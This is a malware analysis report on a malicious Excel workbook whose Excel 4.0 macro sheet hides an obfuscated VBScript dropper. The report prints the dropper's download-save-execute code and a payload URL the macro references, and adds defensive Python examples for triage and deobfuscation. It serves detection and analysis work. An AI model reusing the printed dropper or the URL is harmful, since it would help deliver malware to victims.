Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 c25ca0a5aa7db100…

MALICIOUS

Type: Office (OOXML) / .XLSX
Size: 381.3 KB
Created: 2025-07-14 03:05:35 UTC
Authoring application: Microsoft Excel 15.0300
First seen: 2026-05-13
MD5: 6289c090fabb33d794ee644772b762cf
SHA-1: bb21be8d1e5d6dd328b9e010e1e13f39411779eb
SHA-256: c25ca0a5aa7db10075a392d2bcff13ed8dbc6ddbf01b5f78e40422251921c33c
Risk score: 182

Heuristics (4)

  • Excel 4.0 macro sheet (1 sheet) [critical; 2 related findings] OOXML_XLM_MACROSHEET
    The workbook contains an Excel 4.0 (XLM) macro sheet. XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls until Microsoft tightened the XLM defaults; even legitimate XLM use is rare in modern workbooks. Here the macro sheet is stored as BIFF12 binary content (xl/macrosheets/sheet1.bin, see Extracted artifacts), which XML-only OOXML scanners miss.
  • XLM payload reassembled from CHAR()/split formulas [critical] OOXML_XLM_REASSEMBLED_PAYLOAD
    The macro sheet builds its payload inside the formula token stream by concatenating per-character CHAR() calls and short string fragments, so no WinAPI name, shell command or URL is ever contiguous in the .bin for a literal-bytes scan to find. Re-evaluating the concatenations recovers what the formulas actually assemble: download/execute API names, LOLBin commands (regsvr32/rundll32/mshta/wmic/powershell) or a payload URL, that is, the de-obfuscated download-and-run chain.
  • URL reconstructed from XLM cell array (1 URL) [critical] OOXML_XLM_CELL_ARRAY_URL
    The macro sheet stages its payload URL in one of three non-contiguous forms: one ASCII charcode per numeric cell; inside an embedded HTA that uses VBScript Chr()/&-concatenation; or as multi-character fragment cells that a download formula joins by reference (=A1&A2&… or CONCATENATE(...)). In every form the URL never appears contiguously in the workbook stream, so literal-bytes URL extraction cannot see it. The URL below was recovered by walking the BIFF12 record stream of every worksheet and macrosheet part, decoding RK, inline-string and shared-string cells in both row-major and column-major order, and concatenating FORMULA cell references in token order.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. A URL by itself is not a detection; the per-URL label says which channel (macro, JS, link annotation, document body, ...) reached it.
    URL: http://astaoffices.com/am/amteruth.vbs (referenced by macro)
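
The triage check behind OOXML_XLM_MACROSHEET, as an added example in Python; it is neither the scanner's code nor taken from the report. It builds a constructed, minimal workbook zip in memory so it runs offline: the part names are real OOXML part names, the part bodies are single-byte stand-ins, and the content-type strings are the ones I expect for .xlsb parts (an assumption; the check only looks for the substring "macrosheet", so the exact string does not matter). The point it demonstrates is the one the finding makes: look at xl/macrosheets/ regardless of extension (.xml or .bin), and separately at the content-type overrides, because a .bin part or a part moved out of that folder defeats a scanner that trusts only one of the two.

```python
"""Triage an OOXML workbook for Excel 4.0 (XLM) macro sheet parts.

Added example; not the scanner's code and not from the report. The sample
workbook below is constructed: real part names, stand-in part bodies.
"""
import io
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, Optional

CT_NS = "{http://schemas.openxmlformats.org/package/2006/content-types}"


def find_macrosheet_parts(blob: bytes) -> Dict[str, Optional[str]]:
    """Map part name -> declared content type for every XLM macro sheet part.

    Two independent checks, because a scanner that trusts only one is easy to
    evade: (1) any part under xl/macrosheets/ regardless of extension (.xml,
    or the BIFF12 .bin seen in this sample), and (2) any <Override> in
    [Content_Types].xml whose ContentType names a macrosheet, regardless of
    where the part actually lives in the zip.
    """
    found: Dict[str, Optional[str]] = {}
    with zipfile.ZipFile(io.BytesIO(blob)) as z:
        names = z.namelist()
        overrides: Dict[str, str] = {}
        if "[Content_Types].xml" in names:
            root = ET.fromstring(z.read("[Content_Types].xml"))
            for el in root.iter(CT_NS + "Override"):
                overrides[el.get("PartName", "")] = el.get("ContentType", "")
        for name in names:                       # check 1: location
            if name.lower().startswith("xl/macrosheets/"):
                found[name] = overrides.get("/" + name)
        for part, ct in overrides.items():       # check 2: declared type
            if "macrosheet" in ct.lower():
                found.setdefault(part.lstrip("/"), ct)
    return found


def build_sample(hide_part: bool = False) -> bytes:
    """Constructed stand-in for a binary workbook with one XLM macro sheet.

    With hide_part=True the macrosheet part sits under xl/worksheets/ and only
    its content-type override gives it away, which is what check 2 is for.
    The content-type strings are assumed, not copied from the sample.
    """
    macro_part = "/xl/worksheets/sheet2.bin" if hide_part else "/xl/macrosheets/sheet1.bin"
    ct = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Override PartName="/xl/workbook.bin" ContentType="application/vnd.ms-excel.sheet.binary.macroEnabled.main"/>'
        '<Override PartName="/xl/worksheets/sheet1.bin" ContentType="application/vnd.ms-excel.worksheet"/>'
        f'<Override PartName="{macro_part}" ContentType="application/vnd.ms-excel.macrosheet"/>'
        "</Types>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", ct)
        z.writestr("xl/workbook.bin", b"\x00")
        z.writestr("xl/worksheets/sheet1.bin", b"\x00")
        z.writestr(macro_part.lstrip("/"), b"\x00")   # stand-in, no real BIFF12 records
    return buf.getvalue()


if __name__ == "__main__":
    for hidden in (False, True):
        print("hidden" if hidden else "normal", find_macrosheet_parts(build_sample(hidden)))
```

On a real sample, pass the bytes of the .xlsx/.xlsb file; any non-empty result is worth a look, and a part whose name says worksheet but whose content type says macrosheet is itself a finding.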

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename          Kind            Source                                            Size
emf_00.emf        ooxml-emf       OOXML EMF part: xl/media/image3.emf               38932 bytes
                  SHA-256: 54900bf09168b2eab2b0340f9ddd2245a14a0867bfd12768887a3fc4a7a45b73
xlm_sheet_00.bin  xlm-macrosheet  OOXML XLM macro sheet: xl/macrosheets/sheet1.bin  2943 bytes
                  SHA-256: 249bfb8ce39d6c8c23df5111f52ff1d172120cb8bdb0c28501c8c3f76447b023
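
The reconstruction described by OOXML_XLM_REASSEMBLED_PAYLOAD and OOXML_XLM_CELL_ARRAY_URL, as an added Python example (not the scanner's code). It works on an already-decoded cell grid, a dict of (row, col) to cell value, rather than on the BIFF12 record stream; turning xlm_sheet_00.bin into that grid is a separate parsing step not shown here. SAMPLE_CELLS and the example.test URLs are constructed for the example and are not taken from this sample. It covers all three staging forms the finding lists: CHAR()-chains, fragment cells joined by =A1&A2&… or CONCATENATE(), and one ASCII code per numeric cell walked in both row-major and column-major order, and it shows why both orders are needed: the constructed charcode column is broken up by neighbouring cells in row-major order and only decodes column-major.

```python
"""Reassemble URLs that an XLM macro sheet splits across CHAR() calls,
cell-reference concatenation and per-character numeric cells.

Added example, not the scanner's code. Input is a decoded cell grid
({(row, col): value}); SAMPLE_CELLS and its example.test URLs are constructed.
"""
import re
from typing import Dict, List, Tuple, Union

Cell = Tuple[int, int]                      # (row, col), 1-based as in Excel
Grid = Dict[Cell, Union[str, int, float]]

URL_RE = re.compile(r"https?://[\w.\-]+(?:/[\w.\-/%?=&]*)?", re.I)


def col_index(col: str) -> int:
    """'A' -> 1, 'Z' -> 26, 'AA' -> 27."""
    n = 0
    for ch in col.upper():
        n = n * 26 + ord(ch) - 64
    return n


def split_top_level(s: str, sep: str) -> List[str]:
    """Split on sep outside double quotes and parentheses."""
    parts, cur, depth, inq = [], [], 0, False
    for ch in s:
        if ch == '"':
            inq = not inq
        elif not inq:
            if ch == "(":
                depth += 1
            elif ch == ")":
                depth -= 1
            elif ch == sep and depth == 0:
                parts.append("".join(cur))
                cur = []
                continue
        cur.append(ch)
    parts.append("".join(cur))
    return parts


def eval_string(expr: str, cells: Grid, depth: int = 0) -> str:
    """Evaluate the string-building subset of XLM that droppers use:
    "literal", CHAR(n), CHAR(ref), A1 references, & and CONCATENATE(...)."""
    if depth > 64:                            # self-referencing cells would loop forever
        raise RecursionError("cell reference cycle")
    expr = expr.strip().lstrip("=")
    pieces = split_top_level(expr, "&")
    if len(pieces) > 1:
        return "".join(eval_string(p, cells, depth + 1) for p in pieces)
    if len(expr) >= 2 and expr[0] == '"' and expr[-1] == '"':
        return expr[1:-1].replace('""', '"')
    m = re.fullmatch(r"CHAR\((.+)\)", expr, re.I)
    if m:
        inner = m.group(1).strip()
        code = int(inner) if inner.isdigit() else int(float(eval_string(inner, cells, depth + 1)))
        return chr(code)
    m = re.fullmatch(r"CONCATENATE\((.*)\)", expr, re.I | re.S)
    if m:
        return "".join(eval_string(a, cells, depth + 1) for a in split_top_level(m.group(1), ","))
    m = re.fullmatch(r"\$?([A-Z]{1,3})\$?(\d+)", expr, re.I)
    if m:
        val = cells.get((int(m.group(2)), col_index(m.group(1))), "")
        if isinstance(val, str) and val.startswith("="):
            return eval_string(val, cells, depth + 1)
        return str(val)
    raise ValueError(f"unsupported XLM token: {expr!r}")


def charcode_runs(cells: Grid, order: str = "row") -> List[str]:
    """Decode maximal runs of consecutive cells holding printable-ASCII codes,
    walking row-major or column-major; any other cell ends the run."""
    key = (lambda k: (k[0], k[1])) if order == "row" else (lambda k: (k[1], k[0]))
    runs, cur = [], []
    for k in sorted(cells, key=key):
        v = cells[k]
        if isinstance(v, (int, float)) and not isinstance(v, bool) and float(v).is_integer() and 32 <= int(v) < 127:
            cur.append(chr(int(v)))
        elif cur:
            runs.append("".join(cur))
            cur = []
    if cur:
        runs.append("".join(cur))
    return runs


def recover_urls(cells: Grid) -> List[str]:
    """All three staging tricks in one pass over the grid."""
    found = set()
    for order in ("row", "col"):
        for text in charcode_runs(cells, order):
            found.update(URL_RE.findall(text))
    for v in cells.values():
        if isinstance(v, str) and v.startswith("="):
            try:
                found.update(URL_RE.findall(eval_string(v, cells)))
            except (ValueError, RecursionError):
                pass                          # formula uses something outside the string subset
    return sorted(found)


# Constructed sample: fragments in column A, download formulas in column B,
# and a URL stored one ASCII code per cell down column E.
SAMPLE_CELLS: Grid = {
    (1, 1): "htt", (2, 1): "p://ex", (3, 1): "ample.test/c.vbs",
    (1, 2): '=CHAR(104)&CHAR(116)&CHAR(116)&CHAR(112)&"://example.test/b.vbs"',
    (2, 2): "=A1&A2&A3",
    (3, 2): "=CONCATENATE(A1,A2,A3)",
}
for _i, _ch in enumerate("http://example.test/a.vbs", start=1):
    SAMPLE_CELLS[(_i, 5)] = ord(_ch)

if __name__ == "__main__":
    print(recover_urls(SAMPLE_CELLS))
```

The string-subset evaluator deliberately refuses anything it does not understand instead of guessing; a formula that calls EXEC, REGISTER or a downloaded API is reported as unsupported, which is itself a signal to look at that cell by hand.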
Preview script
First 1,000 lines of the extracted script. The part is a BIFF12 record stream, not text, so the raw preview is binary framing around UTF-16LE cell strings; the readable strings are listed below in the order they appear in the record stream, with spans that are unreadable in the preview marked […].

Leading cell strings (fragmentary):
    kfu
    C:\Users\Public\
    fil
    mwkdv4.vbs

VBScript body held in the cells:
    On Error Resume Next
    kgo7yi = "micrOs"
    k0a333 = "aDo"
    gf4mrh = "db.sTr"
    maxl01 = "oft.xmlh"
    tp1cvu = "D[…]o[…]"
    dim qjhkyw: Set qjhkyw = createobject(k0a333 & gf4mrh & "eam")
    dim ehpqkk: Set ehpqkk = createobject(kgo7yi & maxl01 & "TTP")
    ehpqkk.Open "GET", tp1cvu, False
    ehpqkk.Send
    with qjhkyw
        .type = 1
        .open
        .write ehpqkk.responseBody
        .savetofile "C[…]msexcel.vbs", 2
    end with
    GetObject("new:13709620-C279-11CE-A49E-444553540000").Open("C[…]msexcel.vbs")
    Err.Clear
    wscript C[…]mwkdv4.vbs

Trailing string: SHA-512 (most likely the hash-algorithm name from a sheet-protection record, not script content).

Reading the concatenations: k0a333 & gf4mrh & "eam" is "aDodb.sTream" and kgo7yi & maxl01 & "TTP" is "micrOsoft.xmlhTTP"; the mixed case defeats case-sensitive string matching while CreateObject resolves ProgIDs case-insensitively. The script fetches tp1cvu with an HTTP GET, writes the response body to a .vbs through ADODB.Stream (type 1 = binary), and opens it via GetObject("new:<CLSID>"); 13709620-C279-11CE-A49E-444553540000 is the CLSID of Shell.Application, so this is Shell.Application.Open on the dropped file. The final wscript line runs a second .vbs. The URL literal in tp1cvu is not legible in the preview; the URL listed under EMBEDDED_URL was recovered from the cell array, not from this string.
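
A constant folder for the string-concatenation obfuscation in the VBScript above, as an added Python example (not the scanner's code). SAMPLE is constructed: the assignments and the createobject()/GetObject() calls are the ones legible in the preview, but the URL value, which is unreadable there, is replaced by a constructed example.test address written in the Chr()/& style the OOXML_XLM_CELL_ARRAY_URL finding mentions, and the dropped-file path is a constructed placeholder. The folder propagates string literals, Chr(n) and known variables through & expressions, rewrites each COM instantiation with its resolved ProgID, and labels the well-known Shell.Application CLSID.

```python
"""Constant-fold the string-concatenation obfuscation in a VBScript dropper.

Added example, not part of the report. SAMPLE is constructed (see lead-in).
"""
import re
from typing import Dict, List, Tuple

# Well-known CLSID seen in the preview; GetObject("new:<CLSID>") instantiates it by class id.
CLSID_NAMES = {"13709620-C279-11CE-A49E-444553540000": "Shell.Application"}

SAMPLE = '''On Error Resume Next
kgo7yi = "micrOs"
k0a333 = "aDo"
gf4mrh = "db.sTr"
maxl01 = "oft.xmlh"
tp1cvu = Chr(104) & Chr(116) & "tp://example.test/stage2.vbs"
dim qjhkyw: Set qjhkyw = createobject(k0a333 & gf4mrh & "eam")
dim ehpqkk: Set ehpqkk = createobject(kgo7yi & maxl01 & "TTP")
ehpqkk.Open "GET", tp1cvu, False
ehpqkk.Send
GetObject("new:13709620-C279-11CE-A49E-444553540000").Open("C:\\Temp\\stage2.vbs")
'''

ASSIGN_RE = re.compile(r"^(\w+)\s*=\s*(.+)$")
STR_RE = re.compile(r'^"((?:[^"]|"")*)"$')
CHR_RE = re.compile(r"^chr\(\s*(\d+)\s*\)$", re.I)


def split_amp(expr: str) -> List[str]:
    """Split on & outside string literals (VBScript concatenation)."""
    parts, cur, inq = [], [], False
    for ch in expr:
        if ch == '"':
            inq = not inq
        if ch == "&" and not inq:
            parts.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
    parts.append("".join(cur))
    return parts


def fold_expr(expr: str, env: Dict[str, str]) -> str:
    """Fold an expression made only of "literals", Chr(n), known variables and &."""
    out = []
    for piece in split_amp(expr):
        piece = piece.strip()
        if (m := STR_RE.match(piece)):
            out.append(m.group(1).replace('""', '"'))
        elif (m := CHR_RE.match(piece)):
            out.append(chr(int(m.group(1))))
        elif piece.lower() in env:
            out.append(env[piece.lower()])
        else:
            raise ValueError(f"not a constant string expression: {piece!r}")
    return "".join(out)


def fold_calls(line: str, env: Dict[str, str]) -> Tuple[str, List[str]]:
    """Replace the argument of each createobject()/GetObject() call with its folded
    literal; return the rewritten line and the resolved object names in order."""
    resolved: List[str] = []
    low, pos = line.lower(), 0
    while True:
        hits = [i for i in (low.find(n, pos) for n in ("createobject(", "getobject(")) if i != -1]
        if not hits:
            return line, resolved
        start = low.index("(", min(hits)) + 1
        depth, inq, end = 1, False, start           # find the matching ')', quote-aware
        while end < len(line) and depth:
            ch = line[end]
            if ch == '"':
                inq = not inq
            elif not inq and ch == "(":
                depth += 1
            elif not inq and ch == ")":
                depth -= 1
            end += 1
        try:
            value = fold_expr(line[start:end - 1], env)
        except ValueError:
            pos = end
            continue
        m = re.match(r"new:([0-9A-Fa-f-]{36})$", value)
        resolved.append(CLSID_NAMES.get(m.group(1).upper(), value) if m else value)
        line = line[:start] + '"' + value.replace('"', '""') + '"' + line[end - 1:]
        low, pos = line.lower(), start + len(value) + 2


def deobfuscate(script: str) -> Tuple[List[str], Dict[str, str], List[str]]:
    """Return (rewritten lines, variable -> folded value, instantiated objects)."""
    env: Dict[str, str] = {}
    out, objects = [], []
    for raw in script.splitlines():
        line = raw.strip()
        m = ASSIGN_RE.match(line)
        if m and not line.lower().startswith(("set ", "dim ")):
            try:
                env[m.group(1).lower()] = fold_expr(m.group(2), env)
                line = f'{m.group(1)} = "{env[m.group(1).lower()].replace(chr(34), chr(34) * 2)}"'
            except ValueError:
                pass                              # not a pure string expression; leave as is
        line, resolved = fold_calls(line, env)
        objects.extend(resolved)
        out.append(line)
    return out, env, objects


if __name__ == "__main__":
    lines, env, objects = deobfuscate(SAMPLE)
    print("\n".join(lines))
    print("objects:", objects)
```

The folder is deliberately conservative: a right-hand side that is not a pure string expression (a method call, arithmetic, an unknown variable) is left untouched rather than guessed, so the output stays a faithful record of what was resolved and what still needs a debugger.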